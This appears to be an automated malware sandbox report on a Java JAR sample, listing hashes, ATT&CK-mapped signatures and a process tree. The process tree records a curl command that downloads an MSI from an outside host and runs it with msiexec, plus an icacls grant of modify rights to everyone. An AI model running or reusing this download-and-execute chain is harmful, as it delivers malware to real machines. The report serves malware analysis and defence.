6e301d812bda8318de116a19338a64642086a659833588420d4131fe7008adc8

General

Target

2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
Size

47KB
MD5

7f75fe01e92534899449d5191d586045
SHA1

a26a267dac7dfc8b8feda0a190dc845ad4f6f0ca
SHA256

2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371
SHA512

9b240cdb3d6a00821ef03c749807a3eaea5c1b065f7f88f94c5904a64f94d276a31efefb0a301549744f67a42e3dd8389a6a1d057ff1fd09a942b1b3dd5925bf
SSDEEP

768:s2quUO5gEeRU+aD+QusAXK9wEglRozyt8VomdfeBTcdgknm2+N9Utl:s2RvWayh9owEREmYBgnm2+y

Score

7^/10

discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation cmd.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4960 icacls.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
4960	icacls.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000064efbbd21686319b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000064efbbd20000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090064efbbd2000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d64efbbd2000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000064efbbd200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	cmd.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	816	msiexec.exe
Token: SeIncreaseQuotaPrivilege	816	msiexec.exe
Token: SeSecurityPrivilege	1068	msiexec.exe
Token: SeCreateTokenPrivilege	816	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	816	msiexec.exe
Token: SeLockMemoryPrivilege	816	msiexec.exe
Token: SeIncreaseQuotaPrivilege	816	msiexec.exe
Token: SeMachineAccountPrivilege	816	msiexec.exe
Token: SeTcbPrivilege	816	msiexec.exe
Token: SeSecurityPrivilege	816	msiexec.exe
Token: SeTakeOwnershipPrivilege	816	msiexec.exe
Token: SeLoadDriverPrivilege	816	msiexec.exe
Token: SeSystemProfilePrivilege	816	msiexec.exe
Token: SeSystemtimePrivilege	816	msiexec.exe
Token: SeProfSingleProcessPrivilege	816	msiexec.exe
Token: SeIncBasePriorityPrivilege	816	msiexec.exe
Token: SeCreatePagefilePrivilege	816	msiexec.exe
Token: SeCreatePermanentPrivilege	816	msiexec.exe
Token: SeBackupPrivilege	816	msiexec.exe
Token: SeRestorePrivilege	816	msiexec.exe
Token: SeShutdownPrivilege	816	msiexec.exe
Token: SeDebugPrivilege	816	msiexec.exe
Token: SeAuditPrivilege	816	msiexec.exe
Token: SeSystemEnvironmentPrivilege	816	msiexec.exe
Token: SeChangeNotifyPrivilege	816	msiexec.exe
Token: SeRemoteShutdownPrivilege	816	msiexec.exe
Token: SeUndockPrivilege	816	msiexec.exe
Token: SeSyncAgentPrivilege	816	msiexec.exe
Token: SeEnableDelegationPrivilege	816	msiexec.exe
Token: SeManageVolumePrivilege	816	msiexec.exe
Token: SeImpersonatePrivilege	816	msiexec.exe
Token: SeCreateGlobalPrivilege	816	msiexec.exe
Token: SeBackupPrivilege	2836	vssvc.exe
Token: SeRestorePrivilege	2836	vssvc.exe
Token: SeAuditPrivilege	2836	vssvc.exe
Token: SeBackupPrivilege	1068	msiexec.exe
Token: SeRestorePrivilege	1068	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid process

816 msiexec.exe

pid	process
816	msiexec.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

java.execmd.execmd.exe

description	pid	process	target process
PID 3732 wrote to memory of 4960	3732	java.exe	icacls.exe
PID 3732 wrote to memory of 4960	3732	java.exe	icacls.exe
PID 3732 wrote to memory of 1184	3732	java.exe	cmd.exe
PID 3732 wrote to memory of 1184	3732	java.exe	cmd.exe
PID 1184 wrote to memory of 4348	1184	cmd.exe	curl.exe
PID 1184 wrote to memory of 4348	1184	cmd.exe	curl.exe
PID 3732 wrote to memory of 3176	3732	java.exe	cmd.exe
PID 3732 wrote to memory of 3176	3732	java.exe	cmd.exe
PID 3176 wrote to memory of 816	3176	cmd.exe	msiexec.exe
PID 3176 wrote to memory of 816	3176	cmd.exe	msiexec.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\2e0c02a54421ab2ba82705e261919e34e4109ceb660274a1fd8b3ca25cb60371.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
2⤵
- Modifies file permissions
PID:4960

C:\Windows\SYSTEM32\cmd.exe
cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
2⤵
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\system32\curl.exe
curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
3⤵
PID:4348

C:\Windows\SYSTEM32\cmd.exe
cmd /c C:\downloads\aHPCrYM1.msi
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3176

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi"
3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:816

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1316 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8
1⤵
PID:3100

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Peripheral Device Discovery

2

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\downloads\aHPCrYM1.msi
Filesize
32KB

MD5
00a9fa63e6253cb5f8f8448281ddd054

SHA1
083c7bf52727edffa8160308c677b4da8a4f7815

SHA256
c76014007ba73efc85fd7b1d9e9bced4ea66da7c4cf4dd1560ec0cf02361fc5b

SHA512
bed03aca4562187ab1aa818aa8c53474982c84f5f6e5b0331a2af4feb51d5bc7b1ac1d495040dcd2b572827d019fa3ff04d808011febc9fc52113b93587cb7a5

Download Submit
memory/3732-2-0x000001789D440000-0x000001789E440000-memory.dmp

Filesize
16.0MB

Download
memory/3732-11-0x000001789BA30000-0x000001789BA31000-memory.dmp

Filesize
4KB

Download
memory/3732-16-0x000001789BA30000-0x000001789BA31000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads